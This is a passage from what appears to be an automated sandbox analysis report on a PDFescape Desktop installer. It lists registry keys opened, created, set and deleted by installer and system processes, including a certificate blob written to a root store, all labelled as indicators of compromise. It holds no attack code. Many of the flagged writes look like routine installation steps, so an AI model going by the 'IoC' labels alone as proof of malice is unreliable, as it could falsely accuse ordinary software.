\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe -
Processes:
MsiExec.exeMsiExec.exeMsiExec.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8} MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\Compatibility Flags = "32776" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
spoolsv.exemsiexec.exeupdater-ws.exeprinter-installer-app.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections updater-ws.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1c msiexec.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache updater-ws.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\19 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1C msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\18 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDF Tools AG spoolsv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\OpenAfterConversion = "1" printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1B msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1d msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Printers\DevModePerUser spoolsv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\ChooseFile = "1" printer-installer-app.exe -
Modifies registry class 64 IoCs
Processes:
MsiExec.exews.exeMsiExec.exeregsvr32.exemsiexec.exeMicrosoftEdge.execreator-ws.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A4751E4B-B75D-4D21-92E0-DB3C6A2F4BC8}\ = "_IActivationBridgeEvents" ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B4E2F86-2028-4660-A97E-97B1E11453B0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D55E627-0000-4791-9C81-0222A629540B}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.pdf\shell\edit.PDFescape Desktop msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45A54AE2-5288-433F-B74E-B3ECB3F04CA2}\TypeLib\Version = "1.0" creator-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}\ = "IDownloadItemToolbar" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C11A590C-0000-4C63-8E93-279E07FA7F96}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3BCC59F0-6C35-4FF0-86A9-0A2E267E65B0}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc\ = "PDFescape Desktop ActiveDoc Class" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopPowerPointPlugIn.Connect.1\ = "Connect Class" MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\PDFescape Desktop WWF msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\ECAB801F0EC2B7449A35862E10F9B766\SourceList\Net\1 = "C:\\ProgramData\\PDFescape Desktop\\Installation\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7552FE2425C7EE0418FC6B856BC40759\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{553E3DD7-A661-4EA3-B7BF-A5EF033206F1}\1.0\HELPDIR MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.pdf\PerceivedType = "Document" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766\viewer_preview_handler_feature_x86 = "\x06product_feature" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7552FE2425C7EE0418FC6B856BC40759\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{706BEFD4-71E8-48BA-9E83-6C4B1E974380}\TypeLib\ = "{159B9A1E-E6BA-4134-BBFC-A6C480193408}" ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop" updater-ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{07A165DD-6FB8-4139-8C54-3335413F8637}\1.0\FLAGS MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A2B0490C-BE28-49A7-9F0B-6F64558F1293}\ = "IPDFPreviewer" MsiExec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A4B3E576-A94E-4868-B58A-A9945E47C203}\PROGRAMMABLE MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\7EFDE88A88FC4364C96B8EDC4D0B4A74\4834BE9B59156DE4AB0B66F15C3BE641 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{09C4B9DD-0000-459D-934A-25EC1D0B234A}\ = "SaveUserDataStructLong Class" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C190A609-0000-4E00-B902-A894C0FA44E5}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E6992C88-D2F2-4000-9B5C-C882FFBD5E7C}\ = "PDFescape Desktop Preview Handler" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\EnableFullPage\.pdf MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5A1886BD-3EE1-4DDB-89C5-26D0C7C80E6D}\1.0\0\win64\ = "C:\\Program Files\\PDFescape Desktop\\creator\\plugins\\OfficeAddin\\creator-excel-plugin.dll" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60E3EBCC127EC014D863DEFE735F7634\SourceList msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A9B2ECFD-63DD-4F2E-A329-D22B9884F51C}\PROGRAMMABLE MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C753468E-0000-46FA-B49D-C133BC303D3B} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A2B0490C-BE28-49A7-9F0B-6F64558F1293}\TypeLib MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf\Extension = ".pdf" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\67B9F18DED42FFD488963B21983BF6CA\SourceList\Net\1 = "C:\\ProgramData\\PDFescape Desktop\\Installation\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{86D6EB4B-4F04-403F-BFD2-DC7B66C8D7DA}\TypeLib\Version = "1.0" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\EF9062A7539FC6448A8A11DC1E0778E5\ECAB801F0EC2B7449A35862E10F9B766 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{681C8342-5595-4C45-A93A-4E6DB6A3999D} updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B070A15F-0000-411C-BAA4-424264999487}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1\ = "PDFescape Desktop ActiveDoc Class" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopWordPlugIn.Connect\ = "Connect Class" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AF0E415-0000-4760-8FD7-540C0D4C0A99}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{151CD23A-0000-4238-A15C-69CA34E0BE67}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{57F9206E-944A-444B-B993-9D356DAEF36C}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopWordPlugIn.Connect.1 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{04B2C159-30AC-4E03-A303-00BA4EA26935}\TypeLib\Version = "1.0" ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4834BE9B59156DE4AB0B66F15C3BE641\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56A7C619-0000-4540-A77A-0C6E518E7530}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FD0188E8-0000-49D3-BF36-2B1DB153CEC3}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\PDFescape Desktop\shell\print\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdfescape\DefaultIcon\ = "\"C:\\Program Files\\PDFescape Desktop\\escape.exe\",1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\74E19378919A98E4D870AE52A96DD38B msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe -
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0